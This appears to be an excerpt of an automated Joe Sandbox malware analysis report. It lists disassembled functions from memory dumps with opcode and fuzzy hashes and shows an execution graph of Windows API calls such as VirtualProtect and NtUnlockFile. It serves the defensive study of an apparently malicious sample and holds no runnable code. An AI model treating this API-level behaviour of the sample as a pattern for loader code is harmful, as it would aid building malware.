                                                      Function 00007FFAC2B01930 Relevance: .1, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 835e1d4eb7cf94e8205e4bfe72578585b73356743353cf3d2544e539fbb854dc
                                                      • Instruction ID: 3508358b917cef59574f9c714dcc7e84dc7932ea244a6312e059670bb678f995
                                                      • Opcode Fuzzy Hash: 835e1d4eb7cf94e8205e4bfe72578585b73356743353cf3d2544e539fbb854dc
                                                      • Instruction Fuzzy Hash: 3D11B160D1EBCA0FDB46AB7448191A9BFF0EF43200B4544FBC09DCB397E9AC98058341
                                                      Function 00007FFAC2B02F2D Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4906fa6d29e2548bfed9529cd88f140467f14fee5dee560c56f1633f85149610
                                                      • Instruction ID: 98df1034081a133f0c78db5d6c04244f719014523837d3f14ef8a9b1f312a661
                                                      • Opcode Fuzzy Hash: 4906fa6d29e2548bfed9529cd88f140467f14fee5dee560c56f1633f85149610
                                                      • Instruction Fuzzy Hash: DE01A151B1DD894FDB89FB38841A5B86BD1DF9A24070084FAD04ECB3E7CD1C5C488380
                                                      Function 00007FFAC2B03164 Relevance: .1, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9b5a1ed14e323f945e877c13ef10426410a7d49e3359a06a0991ba3c87ac60fc
                                                      • Instruction ID: 8e8c020853dee7ec52e7ea03df1936b6768ee571ba23edc28353b4e5d2fa920f
                                                      • Opcode Fuzzy Hash: 9b5a1ed14e323f945e877c13ef10426410a7d49e3359a06a0991ba3c87ac60fc
                                                      • Instruction Fuzzy Hash: 5F118E61D1D78A4FDB42AB7444190A97FF0EF47200B4484FBC098CB296EA7C98498741
                                                      Function 00007FFAC2B0F950 Relevance: .1, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a82f49c7fd037c95cc048a51131c1f0a9a70fd2dfd0d74eebaee9fb66154568
                                                      • Instruction ID: f42a1eff28da8731d629e7dbe6356f73c3542d24084fcdb0118ea11b8e322176
                                                      • Opcode Fuzzy Hash: 6a82f49c7fd037c95cc048a51131c1f0a9a70fd2dfd0d74eebaee9fb66154568
                                                      • Instruction Fuzzy Hash: 4E019B91A29D8A0BD799F734C8155F673E1EF95300B004A7AD45FC72DADD68B9458380
                                                      Function 00007FFAC2AFD190 Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dfb3f9a990c27612c3bfff4af2f2ceff27a9ce3330aba5127537f6b5df9da5a5
                                                      • Instruction ID: d54e5ddfc7dedd5c15c4a5f9f9f316c1bcd914f1c2931ea6b7dcfd21cc8c6b41
                                                      • Opcode Fuzzy Hash: dfb3f9a990c27612c3bfff4af2f2ceff27a9ce3330aba5127537f6b5df9da5a5
                                                      • Instruction Fuzzy Hash: 6FF028B390CA0C5EE72C6E58AC4B5F677E4EB87370F10412AE48E93206F851B82341D1
                                                      Function 00007FFAC2B03EF8 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d4c13b4b93394803b5bd6003d4df650df1aa0e3589e2c5e5ffca548a2088203d
                                                      • Instruction ID: df6299db5f8b35b14dcd2f3c241493a87c4252fb52d3c76dbef5e51ecaca6cf8
                                                      • Opcode Fuzzy Hash: d4c13b4b93394803b5bd6003d4df650df1aa0e3589e2c5e5ffca548a2088203d
                                                      • Instruction Fuzzy Hash: DD012DB240CB484FE7259F64880E5B27FF4EF47350B1641AAE08DC7257E9A8BC078391
                                                      Function 00007FFAC2B0306C Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9cf06635728060087d0e21ca10e7ebe12fd356a5a8305d31d963765bb831748d
                                                      • Instruction ID: f8d798bdce23480d76f4fe25d27c62c82a9c230ef1c4736ad7666b5c1cc5bbde
                                                      • Opcode Fuzzy Hash: 9cf06635728060087d0e21ca10e7ebe12fd356a5a8305d31d963765bb831748d
                                                      • Instruction Fuzzy Hash: 71016D60D19A8A4FDB81EB7884591ED7BE1AF56200F4488B6D05CD7396DA7899408700
                                                      Function 00007FFAC2B030A0 Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9dd6e5fba41add0c00e75c792131b0f7f2abee22e4a063c7b20bdffe759b9421
                                                      • Instruction ID: 06f677bd4aa74ce879fdfe88dddcf0aa01519a8aa91f8a24f104176e2d09e2a5
                                                      • Opcode Fuzzy Hash: 9dd6e5fba41add0c00e75c792131b0f7f2abee22e4a063c7b20bdffe759b9421
                                                      • Instruction Fuzzy Hash: 7F018260D1DB8A4EEB82EBB488191AD7EE0EF16200F4085F6D05CC7297EEBC99448341
                                                      Function 00007FFAC2B026F9 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6f91abf7bd6ed2adc2ba6af3b0f4655bd9e88ae5d8a468fd8d4a9586ab7534da
                                                      • Instruction ID: c8f7d8b9d0d189cf7bfb966e9ebdbee160da1085abfed25c9a7a960baf531dc9
                                                      • Opcode Fuzzy Hash: 6f91abf7bd6ed2adc2ba6af3b0f4655bd9e88ae5d8a468fd8d4a9586ab7534da
                                                      • Instruction Fuzzy Hash: E301448590EAC15FD753A77C48684A26FE48E83214318C0EFE0CCCB29BD8885C0EC353
                                                      Function 00007FFAC2B04CCA Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1e7b14d3dc19f0818d70fe1632a8c07151b3936f760c974bbf9af607d713b0d7
                                                      • Instruction ID: a09a2d954c346fb80b877e65e99f612f68cc160a84e958875c667ca2edafc365
                                                      • Opcode Fuzzy Hash: 1e7b14d3dc19f0818d70fe1632a8c07151b3936f760c974bbf9af607d713b0d7
                                                      • Instruction Fuzzy Hash: 6A014F60E19A4E5EDF85EB7484191FDBBE1EF45201F4049B6D41CD3396EE7899058780
                                                      Function 00007FFAC2B047DA Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fff0c15eb9c0feeab33f2bedfd5a7eedbe546f9d34872f9b3367ddb1fa422899
                                                      • Instruction ID: be6abf9ad98b8f5e994ea72d857327ba7139718dfec829485929c59c533ec0f6
                                                      • Opcode Fuzzy Hash: fff0c15eb9c0feeab33f2bedfd5a7eedbe546f9d34872f9b3367ddb1fa422899
                                                      • Instruction Fuzzy Hash: 42014F60D19A8E9FDF45EF7884491FDBBE1EF45200F4089BAD45CD739ADE78A5008740
                                                      Function 00007FFAC2AFC486 Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6b6ce62914f67e179755374401c119bf4f513ff0280c773e712e2d2afd4166d9
                                                      • Instruction ID: 64c005132c8c1f6bf1261b9a08458082e23b2d1074cd262416ce3b09a0f58b23
                                                      • Opcode Fuzzy Hash: 6b6ce62914f67e179755374401c119bf4f513ff0280c773e712e2d2afd4166d9
                                                      • Instruction Fuzzy Hash: B9F08251B29D194EF789B77C58192FC11C3FF89691B804075E40DC73CBED5CA9421381
                                                      Function 00007FFAC2AF7660 Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5de2ae0fa53b348f54f008468e4b733411cfde7b7a83ed58c743f38fbec115d4
                                                      • Instruction ID: 69c46f38044fc81b6d86a1e60b94bc4558d2fbf6e1f86ba21695a074bd3a64da
                                                      • Opcode Fuzzy Hash: 5de2ae0fa53b348f54f008468e4b733411cfde7b7a83ed58c743f38fbec115d4
                                                      • Instruction Fuzzy Hash: D3F01250D3F6461AEFD57BF84D029B827D15F53284F8080B4D88D973D7EE8EA8498262
                                                      Function 00007FFAC2B0435D Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a92e61b2c238736ff3e7b36b11e31e062df3c8f62c30c56eaf55b7db72dbcf16
                                                      • Instruction ID: 61571ed78a40b31a9b660292806609cc65ed37826af4ea1580001b23d0ef0ffd
                                                      • Opcode Fuzzy Hash: a92e61b2c238736ff3e7b36b11e31e062df3c8f62c30c56eaf55b7db72dbcf16
                                                      • Instruction Fuzzy Hash: 97F08271D0968E4FDB85EB7488151ED7BE1AF46201F4185B2C01DCB28ADE68A8008300
                                                      Function 00007FFAC2AFD0DB Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 55c220991405a21361abf1f3734f2ee7a22d010b3ccfe98c3d248708a6ff69f3
                                                      • Instruction ID: 2e28902ec66f2e738ff3bcf3fd7df7a51745de73e59a46e748961b42429c4730
                                                      • Opcode Fuzzy Hash: 55c220991405a21361abf1f3734f2ee7a22d010b3ccfe98c3d248708a6ff69f3
                                                      • Instruction Fuzzy Hash: 66E0DF22B0DD280BD755A66C94099B426C0DB8A244310C0F7D04CCB39AD815AC0E42C1
                                                      Function 00007FFAC2AF5610 Relevance: .0, Instructions: 3COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e9464935e802bec79a524a3d10ccf4fa539fef7f42e7d269a86af8c5644d6c62
                                                      • Instruction ID: 471a4b99e11ce31db1dba75a72a176c093a3cabee8e55296a14abd937000dcf8
                                                      • Opcode Fuzzy Hash: e9464935e802bec79a524a3d10ccf4fa539fef7f42e7d269a86af8c5644d6c62
                                                      • Instruction Fuzzy Hash: FD90024140D2D205D303A93868610D5BB200E52129A6441A3D49488083580411845155

                                                      Non-executed Functions

                                                      Function 00007FFAC2AF0E6D Relevance: 4.1, Strings: 3, Instructions: 352COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "2$#2$5M_^
                                                      • API String ID: 0-3542424494
                                                      • Opcode ID: ab53fbd77f83b5a020493634b1b3a0c88f5314e75533e0dabcad0c2d38723dba
                                                      • Instruction ID: beec404e6b4e17003209aa275e2b573423d04359658f9984850a69d0725bbada
                                                      • Opcode Fuzzy Hash: ab53fbd77f83b5a020493634b1b3a0c88f5314e75533e0dabcad0c2d38723dba
                                                      • Instruction Fuzzy Hash: 3291F493A190AA45E712BB7DFC420F9FBA4DF92336FA08377D958CA1878C08654192F5
                                                      Function 00007FFAC2AF0697 Relevance: 6.6, Strings: 5, Instructions: 343COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ;M_^$=M_^$M_^$M_^*$M_^,
                                                      • API String ID: 0-1945839826
                                                      • Opcode ID: 1d6c2778a97d7ad7593e3eed0e9b9d6b99126b635b70dba5199a1c83e99f447e
                                                      • Instruction ID: 3805cb2fa524b50614fc0eb276751a1ab4045d2c1a7db8623fbdc414d6fa9d3f
                                                      • Opcode Fuzzy Hash: 1d6c2778a97d7ad7593e3eed0e9b9d6b99126b635b70dba5199a1c83e99f447e
                                                      • Instruction Fuzzy Hash: 57A1B4A391D0A645E302BB7DB8410FDBB60DF92336FB04777E868CA1874D4C618292F5

                                                      Execution Graph

                                                      Execution Coverage:5%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:19.6%
                                                      Total number of Nodes:179
                                                      Total number of Limit Nodes:2
                                                      execution_graph 1189 7ff73fd21800 1190 7ff73fd21812 1189->1190 1191 7ff73fd21835 fprintf 1190->1191 1192 7ff73fd21000 1193 7ff73fd2108b __set_app_type 1192->1193 1194 7ff73fd21040 1192->1194 1195 7ff73fd210b6 1193->1195 1194->1193 1196 7ff73fd210e5 1195->1196 1198 7ff73fd21e00 1195->1198 1199 7ff73fd29ef0 __setusermatherr 1198->1199 1255 7ff73fd264c0 1258 7ff73fd22df0 1255->1258 1270 7ff73fd22660 1258->1270 1268 7ff73fd22e3c 1272 7ff73fd22690 1268->1272 1271 7ff73fd2266f memset 1270->1271 1271->1268 1307 7ff73fd2155d 1272->1307 1308 7ff73fd21394 2 API calls 1307->1308 1200 7ff73fd267ff wcslen 1205 7ff73fd215a8 1200->1205 1207 7ff73fd21394 1205->1207 1208 7ff73fd29960 malloc 1207->1208 1209 7ff73fd213b8 1208->1209 1210 7ff73fd213c6 NtUnlockFile 1209->1210 1211 7ff73fd22104 1212 7ff73fd22218 1211->1212 1213 7ff73fd22111 EnterCriticalSection 1211->1213 1216 7ff73fd22272 1212->1216 1218 7ff73fd22241 DeleteCriticalSection 1212->1218 1219 7ff73fd22230 free 1212->1219 1214 7ff73fd2220b LeaveCriticalSection 1213->1214 1215 7ff73fd2212e 1213->1215 1214->1212 1215->1214 1217 7ff73fd2214d TlsGetValue GetLastError 1215->1217 1217->1215 1218->1216 1219->1218 1219->1219 1220 7ff73fd21404 1221 7ff73fd21394 2 API calls 1220->1221 1222 7ff73fd21413 1221->1222 1223 7ff73fd21394 2 API calls 1222->1223 1309 7ff73fd21ac3 1310 7ff73fd21a70 1309->1310 1311 7ff73fd21b36 1310->1311 1312 7ff73fd2199e 1310->1312 1317 7ff73fd21b5c 1310->1317 1314 7ff73fd21ba0 4 API calls 1311->1314 1313 7ff73fd21a0f 1312->1313 1316 7ff73fd219e9 VirtualProtect 1312->1316 1315 7ff73fd21b53 1314->1315 1316->1312 1348 7ff73fd22f88 1351 7ff73fd214a9 1348->1351 1352 7ff73fd21394 2 API calls 1351->1352 1399 7ff73fd21f47 1400 7ff73fd21e67 signal 1399->1400 1402 7ff73fd21e99 1399->1402 1401 7ff73fd21e7c 1400->1401 1400->1402 1401->1402 1403 7ff73fd21e82 signal 1401->1403 1403->1402 1357 7ff73fd2118b 1358 7ff73fd211b9 _amsg_exit 1357->1358 1359 7ff73fd21190 1357->1359 1362 7ff73fd211fa 1358->1362 1359->1358 1360 7ff73fd211a0 Sleep 1359->1360 1360->1358 1360->1359 1363 7ff73fd21201 _initterm 1362->1363 1364 7ff73fd2121a 1362->1364 1363->1364 1365 7ff73fd21880 5 API calls 1364->1365 1366 7ff73fd21247 SetUnhandledExceptionFilter 1365->1366 1367 7ff73fd2126a 1366->1367 1368 7ff73fd2126f malloc 1367->1368 1369 7ff73fd2128b 1368->1369 1370 7ff73fd212a0 strlen malloc memcpy 1369->1370 1370->1370 1371 7ff73fd212d0 1370->1371 1372 7ff73fd2132d _cexit 1371->1372 1373 7ff73fd21338 1371->1373 1372->1373 1224 7ff73fd21e10 1225 7ff73fd21e2f 1224->1225 1226 7ff73fd21e55 1225->1226 1227 7ff73fd21ecc 1225->1227 1228 7ff73fd21eb5 1225->1228 1226->1228 1232 7ff73fd21f12 signal 1226->1232 1227->1228 1229 7ff73fd21ed3 signal 1227->1229 1229->1228 1230 7ff73fd21ee4 1229->1230 1230->1228 1231 7ff73fd21eea signal 1230->1231 1231->1228 1232->1228 1318 7ff73fd21fd0 1319 7ff73fd21fe4 1318->1319 1321 7ff73fd22033 1318->1321 1320 7ff73fd21ffd EnterCriticalSection LeaveCriticalSection 1319->1320 1319->1321 1320->1321 1404 7ff73fd22050 1405 7ff73fd2205e EnterCriticalSection 1404->1405 1406 7ff73fd220cf 1404->1406 1407 7ff73fd220c2 LeaveCriticalSection 1405->1407 1408 7ff73fd22079 1405->1408 1407->1406 1408->1407 1409 7ff73fd220bd free 1408->1409 1409->1407 1410 7ff73fd26550 1411 7ff73fd2655d 1410->1411 1412 7ff73fd26610 wcslen 1410->1412 1411->1412 1459 7ff73fd2153f 1412->1459 1460 7ff73fd21394 2 API calls 1459->1460 1461 7ff73fd2154e 1460->1461 1462 7ff73fd21394 2 API calls 1461->1462 1179 7ff73fd21394 1183 7ff73fd29960 1179->1183 1181 7ff73fd213b8 1182 7ff73fd213c6 NtUnlockFile 1181->1182 1184 7ff73fd2997e 1183->1184 1187 7ff73fd299ab 1183->1187 1184->1181 1185 7ff73fd29a53 1186 7ff73fd29a6f malloc 1185->1186 1188 7ff73fd29a90 1186->1188 1187->1184 1187->1185 1188->1184 1143 7ff73fd211d8 1144 7ff73fd211fa 1143->1144 1145 7ff73fd2121a 1144->1145 1146 7ff73fd21201 _initterm 1144->1146 1156 7ff73fd21880 1145->1156 1146->1145 1149 7ff73fd2126a 1150 7ff73fd2126f malloc 1149->1150 1151 7ff73fd2128b 1150->1151 1152 7ff73fd212a0 strlen malloc memcpy 1151->1152 1152->1152 1153 7ff73fd212d0 1152->1153 1154 7ff73fd2132d _cexit 1153->1154 1155 7ff73fd21338 1153->1155 1154->1155 1157 7ff73fd21247 SetUnhandledExceptionFilter 1156->1157 1158 7ff73fd218a2 1156->1158 1157->1149 1158->1157 1159 7ff73fd2194d 1158->1159 1164 7ff73fd21a20 1158->1164 1160 7ff73fd2199e 1159->1160 1161 7ff73fd21956 1159->1161 1160->1157 1163 7ff73fd219e9 VirtualProtect 1160->1163 1161->1160 1169 7ff73fd21ba0 1161->1169 1163->1160 1164->1160 1165 7ff73fd21b5c 1164->1165 1166 7ff73fd21b36 1164->1166 1167 7ff73fd21ba0 4 API calls 1166->1167 1168 7ff73fd21b53 1167->1168 1172 7ff73fd21bc2 1169->1172 1170 7ff73fd21c04 memcpy 1170->1161 1172->1170 1173 7ff73fd21c45 VirtualQuery 1172->1173 1174 7ff73fd21cf4 1172->1174 1173->1174 1178 7ff73fd21c72 1173->1178 1175 7ff73fd21d23 GetLastError 1174->1175 1176 7ff73fd21d37 1175->1176 1177 7ff73fd21ca4 VirtualProtect 1177->1170 1177->1175 1178->1170 1178->1177 1333 7ff73fd2219e 1334 7ff73fd221ab EnterCriticalSection 1333->1334 1335 7ff73fd22272 1333->1335 1336 7ff73fd22265 LeaveCriticalSection 1334->1336 1338 7ff73fd221c8 1334->1338 1336->1335 1337 7ff73fd221e9 TlsGetValue GetLastError 1337->1338 1338->1336 1338->1337 1233 7ff73fd238e0 wcslen 1241 7ff73fd2157b 1233->1241 1242 7ff73fd21394 2 API calls 1241->1242 1463 7ff73fd22320 strlen 1464 7ff73fd22337 1463->1464 1252 7ff73fd215e4 1253 7ff73fd21394 2 API calls 1252->1253 1254 7ff73fd215f3 1253->1254 1374 7ff73fd21e65 1375 7ff73fd21e67 signal 1374->1375 1376 7ff73fd21e7c 1375->1376 1378 7ff73fd21e99 1375->1378 1377 7ff73fd21e82 signal 1376->1377 1376->1378 1377->1378 1381 7ff73fd2146d 1382 7ff73fd21394 2 API calls 1381->1382 1383 7ff73fd21a70 1384 7ff73fd2199e 1383->1384 1388 7ff73fd21a7d 1383->1388 1385 7ff73fd21a0f 1384->1385 1386 7ff73fd219e9 VirtualProtect 1384->1386 1386->1384 1387 7ff73fd21b5c 1388->1383 1388->1387 1389 7ff73fd21b36 1388->1389 1390 7ff73fd21ba0 4 API calls 1389->1390 1391 7ff73fd21b53 1390->1391 1392 7ff73fd2216f 1393 7ff73fd22178 InitializeCriticalSection 1392->1393 1394 7ff73fd22185 1392->1394 1393->1394 1339 7ff73fd21ab3 1340 7ff73fd21a70 1339->1340 1340->1339 1341 7ff73fd21b36 1340->1341 1346 7ff73fd2199e 1340->1346 1347 7ff73fd21b5c 1340->1347 1343 7ff73fd21ba0 4 API calls 1341->1343 1342 7ff73fd21a0f 1344 7ff73fd21b53 1343->1344 1345 7ff73fd219e9 VirtualProtect 1345->1346 1346->1342 1346->1345

                                                      Executed Functions

                                                      Function 00007FF73FD2118B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108sleepstringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.295183169808.00007FF73FD21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73FD20000, based on PE: true
                                                      • Associated: 00000002.00000002.295183134758.00007FF73FD20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183205507.00007FF73FD2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183256303.00007FF73FD2D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183298379.00007FF73FD2E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183791752.00007FF73FFAA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183839826.00007FF73FFAC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183875439.00007FF73FFAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff73fd20000_zxcvbnmasd.jbxd
                                                      Similarity
                                                      • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                      • String ID: &
                                                      • API String ID: 2643109117-1499360005
                                                      • Opcode ID: 7b05b1bcf751b2985ad3cedc123b854032e764e496f5deba70c02dad05f993e7
                                                      • Instruction ID: fb2bee04d0746c317be5a5829ea5066738d7723a45732164689bfb67297d29cf
                                                      • Opcode Fuzzy Hash: 7b05b1bcf751b2985ad3cedc123b854032e764e496f5deba70c02dad05f993e7
                                                      • Instruction Fuzzy Hash: 26413C31A2A6CBB5EA09BB15DDA93F9A391AF447C0F809131D90D433A5DE2CE445A7E0
                                                      Function 00007FF73FD21394 Relevance: 1.5, APIs: 1, Instructions: 24filenativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • NtUnlockFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF73FD21156), ref: 00007FF73FD213F7
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.295183169808.00007FF73FD21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73FD20000, based on PE: true
                                                      • Associated: 00000002.00000002.295183134758.00007FF73FD20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183205507.00007FF73FD2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183256303.00007FF73FD2D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183298379.00007FF73FD2E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183791752.00007FF73FFAA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183839826.00007FF73FFAC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.295183875439.00007FF73FFAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff73fd20000_zxcvbnmasd.jbxd
                                                      Similarity
                                                      • API ID: FileUnlock
                                                      • String ID:
                                                      • API String ID: 45017762-0
                                                      • Opcode ID: 6eab849e4bd19e69aa9a07cb78ba4307910597b61e1bf347180cd5424be41928
                                                      • Instruction ID: 3d51f58f3a7105d2cbbe0ecbefda5e17ff5506661e12b94d6dae78e41688d600
                                                      • Opcode Fuzzy Hash: 6eab849e4bd19e69aa9a07cb78ba4307910597b61e1bf347180cd5424be41928
                                                      • Instruction Fuzzy Hash: 24F01931918B85B2D608EB11FD644AAB3A0FB883C1B404835E98C13728CF3CE051BBE0

                                                      Non-executed Functions

